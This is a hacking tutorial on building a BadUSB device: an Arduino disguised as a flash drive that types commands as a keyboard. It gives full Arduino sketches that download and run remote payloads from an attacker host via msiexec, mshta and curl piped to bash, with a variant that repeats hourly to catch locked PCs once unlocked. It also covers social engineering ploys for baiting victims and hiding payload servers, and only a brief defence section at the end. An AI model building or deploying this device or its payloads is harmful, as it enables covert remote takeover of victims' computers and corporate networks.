VERY bad flash drive. BadUSB attack in detail

BadUSB attacks are efficient and deadly. This article explains how to deliver such an attack, describes in detail the preparation of a malicious flash drive required for it, provides code that must be written on this device, and discusses how to make Windows and Linux users plug your ‘memory stick’ into their computers.

BadUSB is a family of attacks delivered through a USB port: the connected malicious device pretends to be something else, for instance:

HID device (i.e. keyboard or mouse);
Ethernet (network card); or
Mass storage.

The first two options are of utmost interest. This article describes the variant with a HID device; while the next one explains how to deliver an attack via a network card. The HID device attack is one of the few physical attacks that involve a social factor (i.e. your success depends on user’s actions). There is also another variant that doesn’t require victim’s direct involvement, but first things first.

info

This article continues the series of publications describing practical hacking and attacking techniques involving makeshift devices that can be easily assembled at home. You will learn how to gain unauthorized access to protected information and how to protect your own data from such attacks. The previous article in this series was Croc-in-the-middle. Using crocodile clips do dump traffic from twisted pair cable.

Theory

The BadUSB-HID attack involves a device plugged into a USB port; this device is programmed as a keyboard (sometimes as a mouse), but it is not. Its deceptive appearance represents an element of social engineering.

The most popular form factor for such a device is a flash drive. Taking the small size of the malicious device, it can be hidden anywhere: in a webcam or even within a USB cable (O.MG Cable). The shape of the device is determined by the context: it must be optimally suited for this or that specific situation.

The tiny device with a keyboard controller performs arbitrary keystrokes as soon as it’s plugged. The possibility to preprogram these keystrokes is used to enter OS commands using respective hotkeys (e.g Win-R or Alt-F2).

The BadUSB-HID attack targets:

unlocked PCs (the flash drive is plugged by the user, and instant RCE occurs); and
locked PCs (the flash drive is covertly plugged by the attacker, and delayed RCE occurs later).

In both variants, you have a chance to get RCE, which means that battle is worth the blood. The attack is delivered almost instantly (since the keystrokes are performed quickly enough). It’s quite possible that the victim won’t even notice nothing.

Hardware

In my opinion, the decisive factor in the implementation of a BadUSB-HID device is its low cost and ease of assembly. To deliver this attack, you have to ‘plant’ such flash drives in the vicinity of potential victims; so, they become ‘expendable supplies’.

The keyboard controller can be emulated using a number of microcontroller boards.

Why order expensive and suspiciously-looking solutions like hak5 (with the Rubber Ducky logo) if you can assemble everything yourself and for less cost? If everything is done correctly, you can disperse dozens of such ‘memory sticks’.

The obvious choice is an Arduino board. It’s inexpensive and available in specialized electronics stores.

For me personally, the main problem was to get a case. One of the variants is to purchase the cheapest flash drive with suitable dimensions and remove its contents leaving only the empty case. Or, for instance, print the case on a 3D printer.

Since most Arduino boards come with a micro-USB interface, you have to resolder the connector to a classical USB plug; otherwise the user won’t trust a flash drive with a nonstandard interface. The board may not be structurally adapted for the USB-A plug; so, you should attach it to the body of the flash drive with glue and then solder the board using a pair of hard wires. This way, when the ‘memory stick’ is unplugged, the stress is applied to its case, not to the board itself.

You can slightly reduce the board width by sawing off a few millimeters from each edge in the additional contacts zone (since you won’t need them). As a result, you will be able to fit an Arduino Pro Micro into a classic flash drive case as shown below.

A fully assembled battle ‘memory stick’ looks as follows.

A keyboard and a flash drive: find a difference

Ideally, your device shouldn’t differ from an ordinary flash drive. Too bad, Windows 7 and older systems cannot detect the most popular Arduino Pro Micro board without drivers, but today, Windows 10 is much more common. If you need compatibility with Windows 7 and older systems, purchase a more expensive Teensy board or something similar. It’s quite possible that more suitable hardware solutions will appear by the time of publication.

Software

Thanks to the built-in bootloader, Arduino supports multiple flashing; so, you can write commands to it repeatedly for each specific situation. In fact, you have to flash only user application code.

Programs (or sketches in Arduino notation) are compiled for an AVR processor and flashed via USB using the same Arduino program:

apt install arduino
arduino

To emulate a keyboard on Arduino, use the following API:

void setup(){   // Code that is executed only once - when the device is connected over USB
    Keyboard.begin(); // Enable keyboard controller mode
    delay(2000); // Pause in milliseconds
    Keyboard.press(KEY_LEFT_SHIFT);  // Hold keys
    Keyboard.press(KEY_RETURN);
    delay(100);
    Keyboard.releaseAll();  // Release held keys
    Keyboard.print("cmd /c evil command"); // Type text using the keyboard
    Keyboard.write(KEY_RETURN);     // Press key
  }
void loop(){ delay(3600000); something(); } // Code executed in a loop

As soon as the code is written, the program is compiled and uploaded to the controller:

Service → Board: Arduino Micro
Tools → Serial port: /dev/ttyACM0
File → Upload

If everything went well, then your ‘flash drive’ will reboot in a few seconds and perform all the preprogrammed keystrokes directly on your PC. And, of course, these keystrokes are far from being innocent…

Attacking unlocked computers

This attack was brilliantly demonstrated in the Mister Robot TV drama (see below).

The idea is that the user picks up a flash drive planted by you and plugs it into their computer (that might be located, for instance, somewhere in a corporate or even industrial network). After the flash drive is plugged into a USB port, it executes the code flashed into it using preprogrammed keystrokes, thus, opening remote access to the attacker.

As you remember, your USB device is not what the user expects from it. In this particular case, the user assumes that it’s an ordinary memory stick, but as of a sudden, it’s a… keyboard.

As said above, this attack involves social engineering. Below are some scenarios enabling you to lull the vigilance of a potential victim:

a consignment or an envelope with the flash drive allegedly intended for the management is delivered to the reception;
the flash drive is dropped into the curious user’s mailbox or near the office; or
the flash drive is given to the user under the guise of a client (if the company accepts data on flash drives).

Now a few words about the keystrokes you have to perform and how to execute the code quickly and reliably. The code must give you remote access. The easiest way is to run a RAT (remote administrative tool) that installs a backdoor on the target computer. For instance, like this:

msiexec /i http://rce.attacker.tk/shell.msi /quiet
mshta http://rce.attacker.tk/shell.hta
curl -L http://rce.attacker.tk/1.sh|bash

Each of the above commands (depending on the OS) is built-in, short, and automatically downloads and runs the code over HTTP (preferably over HTTPS) in one action.

Before the attack, the malefactor most probably doesn’t possess comprehensive information about network restrictions from the local network towards the Internet. And there is no 100% guarantee that the network connection from the victim’s computer reaches the remote control server. But the execution of the above commands triggers a specially designed sequence of actions; by tracking these actions, the attacker gains a sufficient amount of information:

Since you have specified the server address by name, a DNS query will be sent. The DNS system is distributed, and a request from the victim’s computer is usually sent in any case. If you use your own DNS zone delegated to a server under your control, you’ll see this request in the logs. This is a signal that the flash drive has been connected and RCE occurred. However, this does not guarantee that you gain network access.
If access to the Internet from the corporate network isn’t restricted, then an HTTP request will be sent to the attacker’s server, which can also be seen in the logs. This indicates that a network connection is possible and you will be able to remotely control the compromised node. However, this does not guarantee that the OS security mechanisms allow direct execution of the remote control program.
You gain a shell. Success!

Even if the attack fails, the attacker gains information about rules regulating access to the Internet from users’ computers and about their awareness of such incidents. Such information can be used in subsequent attacks.

As you can see in the figure below, immediately after plugging the flash drive, the “Run” window opens, and a command is entered in this window; this command downloads and launches the remote control program from the attacker’s server.

As a result, just a few seconds after being plugged in, the ‘flash drive’ launches a backdoor, and the attacker gains remote control over the system with all the consequences that come with it.

To remain anonymous when you deliver such an attack and hide the address of your server, you can use public services that enable you to upload anything and then download your stuff over HTTP (e.g. paste.c-net.org or ix.io).

If you deliver this attack against computers operated by non-anglophone users, an additional problem arises: a non-Latin keyboard layout (e.g. Russian) can be enabled in the OS. If your set of keystrokes is performed not in the Latin layout, then the attack will fail.

In such situations, two approaches can be used to perform the correct keystrokes:

perform keystrokes “as is”, then switch the language layout and repeat them; or
use ALT-codes (three-four clicks for each letter), change the status of the NumLock key, and repeat the keystrokes.

There is no definitive way to win. In one case, you must guess the keyboard layout; in the other, activate its digital part. Which option to use is up you. The typing speed is quite fast (there is no difference with ALT codes), but the Arduino sketch file looks more readable with classic typing; so, I choose this variant.

The BadUSB attack isn’t platform-specific, and, along with Windows, you can attack Linux and even Mac computers. Below is a universal sketch for attacks against Windows/Linux workstations:

void windows_run() {
    Keyboard.press(KEY_LEFT_GUI);
    Keyboard.press('r');
    delay(250);
    Keyboard.releaseAll();
    Keyboard.print("msiexec /i http://rce.attacker.tk/1.msi /quiet");
    delay(100);
    Keyboard.write(KEY_RETURN);
}
void linux_run() {
    Keyboard.press(KEY_LEFT_ALT);
    Keyboard.press(KEY_F2);
    delay(250);
    Keyboard.releaseAll();
    Keyboard.print("curl -L http://rce.attacker.tk/1.sh|bash -");
    delay(100);
    Keyboard.write(KEY_RETURN);
}
void rce() {
    windows_run();
    delay(100);
    linux_run();
    delay(100);
}
void switchLang() {
    Keyboard.press(KEY_LEFT_SHIFT);
    Keyboard.press(KEY_LEFT_ALT);
    delay(100);
    Keyboard.releaseAll();
    Keyboard.press(KEY_LEFT_SHIFT);
    Keyboard.press(KEY_LEFT_CTRL);
    delay(100);
    Keyboard.releaseAll();
}
void setup() { // Will be executed when the device is plugged into a USB port
    Keyboard.begin();
    delay(2000);
    rce();
    switchLang();
    rce();
  }

Regardless of the OS running on the attacked PC, the above sketch will execute two commands (for Windows and Linux, respectively) at a sufficiently high speed. Then it will switch the language layout in two ways and repeat the commands again. As a result, you have four attempts to execute commands: two to guess the OS, and two to guess the language layout.

Attacking locked computers

In addition to the setup() function that is executed when the device is plugged in, Arduino has a predefined loop() function that runs in an infinite loop.

The idea is to initiate keystrokes not only at the time of connection to the victim PC, but repeat them at each preselected time interval:

void setup() { // Will be executed when the device is plugged to a USB
    Keyboard.begin();
    delay(2000);
    rce();
    switchLang();
    rce();
  }
void loop(){ delay(3600000); setup(); } // Code will be executed every hour

In other words, a flash drive can be covertly plugged into a locked computer and programmed to perform keystrokes not immediately, but every N hours or minutes to catch a moment when the PC is unlocked (delayed RCE). While the PC is locked, all keystrokes will be sent to the password entry field and disappear; as a result, the attack will be delivered virtually without a trace.

The form factor of the target PC can benefit the attacker. It’s quite easy to covertly plug something into a system unit staying in a dusty dark corner: no one will notice it for years. A laptop is a different story since it’s always in front of your eyes. But even if all USB ports of the attacked computer are visible to the user, there are still some wires (mouse, keyboard, etc.) connected to it, and you can insert a small USB hub with a BadUSB flash drive in the middle as shown below.

BadUSB-HID acting as a keyboard in the middle

In fact, such a device makes useless all attempts to secure your computer by locking it (and people are so used to this ‘protective measure’). One day, a malicious device can be inserted into a laptop left unattended – and voila! And it doesn’t matter whether the computer was locked or not: the BadUSB flash drive will try to perform keystrokes (your arbitrary code) every several minutes, hours, or days. Sooner or later, the PC will be unlocked. Then the malicious code will be executed, the attacker will gain remote access, and the company’s internal network will be compromised.

Protection

The best protection in such situations are specialized software solutions that allow connection only to preapproved devices from the white list. Each USB device has its own unique VendorID and ProductID, and these parameters are recorded in white lists. All other USB devices, including BadUSB flash drives, won’t be recognized by the OS. This measure reliably protects your PC not only from the above-described attack, but also from a number of other attack vectors.

Personnel training is of utmost importance as well: users must be aware of information security issues since the BadUSB attack is mainly of social nature and people themselves put their computers at risk by plugging unfamiliar devices into them. Also, company executives should inspect users’ workstations on a regular basis and check if any alien devices are connected to them.